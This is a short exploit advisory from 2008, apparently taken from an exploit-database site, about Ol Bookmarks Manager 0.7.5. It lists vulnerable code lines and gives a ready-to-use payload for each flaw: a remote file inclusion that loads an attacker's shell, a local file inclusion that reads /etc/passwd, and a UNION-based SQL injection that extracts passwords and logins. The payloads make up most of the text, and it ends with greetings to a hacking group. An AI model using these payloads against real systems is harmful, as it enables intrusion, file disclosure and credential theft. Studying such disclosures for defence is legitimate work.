[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities
# Published : 2008-09-24
# Author : GoLd_M
# Previous Title : Rianxosencabos CMS 0.9 Remote Add Admin Exploit
# Next Title : Jetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities
#########################################
Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities
#########################################
POC & Vulns
RFI In (frame.php) In Line 46
include "$_GET[framefile]";
#########################################
Ex : /frame.php?framefile=[Shell]
#########################################
LFI In (/read/frame.php) In Line 46
include "../$_GET[framefile]";
#########################################
Ex : /frame.php?framefile=../../../../../../etc/passwd
#########################################
SQL Injection In /read/index.php?name=brian&id=
Ex : /read/index.php?name=brian&id=-0000008+union+select+1,2,3,4,password,login,7,8,9,10,12,11,13+from+preferences--
#########################################
Thanx To .. Tryag.cc/cc ..And.. All Members In TryaG
# www.Syue.com [2008-09-24]